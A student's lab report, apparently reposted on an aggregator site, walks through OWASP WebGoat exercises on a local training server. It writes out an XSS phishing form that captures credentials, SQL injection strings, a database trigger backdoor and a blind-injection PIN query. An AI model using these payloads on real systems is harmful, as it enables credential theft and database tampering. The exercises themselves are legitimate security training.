20155326《网络对抗》Web安全基础实践

Posted 20155326刘美岑

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了20155326《网络对抗》Web安全基础实践相关的知识,希望对你有一定的参考价值。

20155326《网络对抗》Web安全基础实践

实验后回答的问题

  • SQL注入攻击原理,如何防御?

原理:SQL注入攻击指的是在Web应用对后台数据库查询语句处理存在的安全漏洞,通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,由于在设计程序中忽略对可能构成攻击的特殊字符串的检查,所以通过执行SQL语句进而执行攻击者所要的操作,使非法数据侵入系统。后台数据库将其认作正常SQL指令后正常执行,可能实现对后台数据库进行各种操作,甚至造成破坏后台数据库等严重后果。

防御:

1.对输入的数据进行过滤,过滤掉敏感字符。
2.加密数据库。

  • XSS攻击的原理,如何防御?

原理:XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码(如,html代码和客户端脚本)植入到提供给其它用户使用的页面中,攻击者可以利用XSS漏洞旁路掉访问控制。

防御:

1.浏览器自身可以识别简单的XSS攻击字符串,从而阻止简单的XSS攻击。
2.消除网站的XSS漏洞,需要网站开发者运用转义安全字符等手段。

  • CSRF攻击原理,如何防御?

原理:CSRF攻击的原理就是使攻击者盗取用户的身份,然后以用户的身份发送恶意请求。盗取用户身份是通过Cookie来完成的。

防御:

1.对用户来说要尽量及时的清理Cookie。
2.对Web端来说,可以在客户端页面增加伪随机数,使攻击者得不到用户的Cookie

实践过程记录

WebGoat

Webgoat是OWASP组织研究出的一个专门进行web漏洞实验的应用品台,这个平台里包含了web中常见的各种漏洞,例如:跨站脚本攻击、sql注入、访问控制、隐藏字段、Cookie等;

OWASP(Open Web Application Security Project)是一个非营利的组织,它的目的是帮助个人和企业来发现和使用可信赖的软件。
在终端中输入java -jar webgoat-container-7.0.1-war-exec.jar开启WebGoat。

直到出现INFO: Starting ProtocolHandler ["http-bio-8080"]

打开浏览器,在地址栏输入localhost:8080/WebGoat打开WebGoat,选择默认账号、密码即可登陆成功。

XSS攻击

  • Phishing with XSS 跨站脚本钓鱼攻击

跨站脚本攻击最大的魅力是通过HTML注入劫持用户的浏览器,任意构造用户当前浏览的HTML内容,甚至可以模拟用户当前的操作。这里实验的是一种获取用户名和密码的攻击

先编写一个包含用户名、密码的前端代码:



<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;background-color:green;"></div>
<div style="float:left;height:100px;width:50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>
 
</div></div>
</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
  </script>
<form name="phish">
<br>
<br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>


然后在webgoat找到xss攻击打开Phishing with XSS(第一个)

将这段代码输入到输入框中,点击search出现登录框,在登录框中输入用户名、密码:

点击登录后跳出弹框,其中包含用户输入的用户名、密码。攻击成功!

  • Stored XSS Attacks 存储型XSS攻击

存储型XSS攻击代码存储于数据库中,每次当用户打开此网页时便会执行,危害大,常用于留言板,每次当用户查看留言信息时即触发。导致用户访问时载入非预期的页面或内容。

具体实例来说明就是,黑客在留言板内插入恶意的html或者javascript代码,并且提交。网站后台程序将留言内容存储在数据中,之后一个用户也访问这个论坛,并刷新了留言板,这时网站后台从数据库中读取了之前黑客的留言内容,并且直接插入在html页面中,这就可能导致黑客留言的脚本本身应该作为内容显示在留言板的,然后此时可能黑客的留言脚本被浏览器解释执行了。然后黑客通过javascript获取用户的cookie,根据这个cookie窃取用户信息,之后重定向网站到一个钓鱼网站;重新更改页面内容,假装让客户输入用户名、密码,然后提交到黑客的服务器。

在左侧打开Stored XSS Attacks,在Message框中输入

当在论坛中点击刚刚创建的帖子后,弹出对话框,显示I am 20155326lmc。攻击成功!

  • Reflected XSS Attacks 反射型XSS攻击

存储型XSS与反射型XSS的区别:

存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。

反射型XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。

当在HTTP响应中使用未经验证的用户输入时,可能发生XSS。在一个反射的XSS攻击中,攻击者可以用攻击脚本制作URL并将其张贴到另一个网站上,发送电子邮件,或者以其他方式让受害者点击它。

打开xss的第三个攻击,在code框中输入带有攻击性的URL作为输入源,

点击Purchase出现对话框,显示I am 20155326lmc。攻击成功!

CSRF攻击

跨站请求伪造,它与XSS不同之处在于,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。

  • Cross Site Request Forgery(CSRF)

练习的目标是发送电子邮件到新闻组。电子邮件包含一个图像,其URL指向恶意请求。在本课中,URL应该指向“攻击”Servlet,该课程的“屏幕”和“菜单”参数和一个额外的参数“TrimeFund”具有任意数值,如5000。您可以通过在右边插入的参数中找到“屏幕”和“菜单”值来构建链接。当时被认证的CSRF邮件的收件人将转移他们的资金。当这一课的攻击成功时,左边的菜单旁边出现一个绿色的复选标记。

以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件。

我们在message框中输入这样一串代码

注意这里面的Screen和menu的值每个人可能不一样,可以在当前页面的右边有个Parameters进行查看,然后通过宽高设置成1像素,隐藏掉这个图片。我这里src=281,menu=900。

提交后生成一个链接20155326:

点击学号名即可查看用户操作的信息,攻击成功

  • CSRF Prompt By-Pass

目标是向包含多个恶意请求的新闻组发送电子邮件:第一个转移资金,第二个请求确认第一个请求被触发的提示。URL应该指向这个CSRF提示的攻击servlet,通过PASS课程的屏幕、菜单参数和一个额外的参数“TrimeBoover”,它具有一个数字值,比如“5000”来启动一个传输,一个字符串值“确认”完成它。您可以从右边的插图复制该课程的参数,创建“攻击”格式的URL。屏幕= xxx和菜单= yyy和转移资金= ZZZ”。无论谁收到这封电子邮件,恰巧在那时被认证,他的资金将被转移。当您认为攻击成功时,刷新页面,您将在左侧菜单中找到绿色检查

查看页面右边Parameters中的src和menu值。

在message中添加代码:

提交后生成一个链接20155326

点击学号名即可查看用户操作的信息,攻击成功

SQL注入攻击练习

SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。

  • Numeric SQL Injection

这一题的选择框也是一个下拉框,在当前网页上无法修改,于是,我们使用BurpSuite抓包修改。

打开BurpSuite:

在BurpSuite中依次选择Proxy->Options->Add添加一个端口,将绑定的端口设为5326,点击确认后会在Options下增加一行,勾选新形成的这一行:

点击浏览器右上方的更多选项卡,选择preference

在页面左侧选择advanced,选择network页标签,在connection那一行选择settings…

在弹出的窗口中设置代理服务器和与BurpSuite中绑定的一致的端口

设置好代理后回到题目页面,点击Go,然后进入BurpSuite中依次选择Proxy->Intercept,可以看到已经抓到了包:

右键选择send to repeater

进入repeater页标签,选择Params将其中station的值改为101 or 1=1,点击Go运行,查看右侧代码可以看到包中的SQL语句为

SELECT * FROM weather_data WHERE station = 101 or 1=1

回到Proxy中点击Intercept is on对剩下的包不作处理,回到火狐发现已经成功。

  • LAB:SQL Injection(Stage 1:String SQL Injection)

使用用户Neville进行登录,在密码栏中输入\' or 1=1 --进行SQL注入,结果登录失败。

使用一个新的工具firebug,可以显示当前网页的源码并直接在其中修改。

查看源码发现输入框对输入的字符长度进行了限制,最多允许输入8个字符。

对长度maxlength值进行扩大改成20,然后在密码栏中再次输入\' or 1=1 --,点击登录就成功了

注意,要开着扩大后的源码页面点登陆login,因为它并不能保存。

  • LAB:SQL Injection(Stage 3:Numeric SQL Injection)

用上一题的方法成功登录larry

查看网页源码,选择查看viewprofile部分的代码,这时候可以看到一行用员工id作为索引来传送数据的代码,双击这行代码就可以出现value的值,因为我们想要用Larry的账户浏览老板信息,而大多数企业公司里老板的工资应该是最高的,所以我们就把其中的value值由101改为101 or 1=1 order by salary desc --,这样老板的信息就会被排到第一个让我们看到

可以看到老板应该就是Neville了,电话地址电邮工资卡等等信息一览无余。

  • String SQL Injection

在输入框中输入Smith进行尝试,观察下方形成的输入语句,可以看到输入的Smith在两个单引号之间:

构造永真式\'or 1=\'1,第一个分号用来闭合原输入语句的前一个分号,而第二个分号用来闭合原输入语句的后一个分号,使这条语句被强行拆分成为两条语句。

这样一来,攻击就成功了,可以显示所有用户的信息了。

  • Database Backdoors

先输入示例101进行尝试,得到了该用户的信息。

观察发现输入的语句不进行验证,于是我们输入语句:101; update employee set salary=666666成功将该用户的工资变成123456,攻击成功:

下一步,输入语句

101 or 1=1;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=\'20155326@qq.com\' WHERE userid = NEW.userid
就可以了,表中一旦添加新用户那么就在用户表里将新用户的邮箱改为我设置的邮箱。

  • Blind Numeric SQL Injection

尝试题目中给出的例子,在输入框输入101,运行后发现返回Account number is valid,说明这个数是合法的!

构造输入语句101 AND ((SELECT pin FROM pins WHERE cc_number=\'1111222233334444\') > 数值 );,根据返回的语句是否合法判断pin值的范围。

这里一直试下去,直到最后确定值是2364,输入2364后破解成功:

实验总结与体会

做了这么多练习,感觉很有成就感,尤其是在这十几个练习中,遇到了这样那样的问题,后来都通过自己的自主学习解决了。这种在自主学习之后,动手实践,发现问题、解决问题的过程,不仅给予了我更多学习的信心和动力,也让我在不断解决问题的过程中提升了自己各方面的能力,掌握了更全面的知识。

以上是关于20155326《网络对抗》Web安全基础实践的主要内容,如果未能解决你的问题,请参考以下文章

20155326《网络对抗》网络欺诈技术防范

20155326刘美岑《网络对抗》Exp5 MSF基础应用

20155326《网络对抗》免考项目—— 深入恶意代码之恶意代码详解

20155326《网络对抗》免考项目——深入恶意代码之恶意代码的类型

20145326蔡馨熤《网络对抗》—— Web安全基础实践

20145317彭垚《网络对抗》Exp9 Web安全基础实践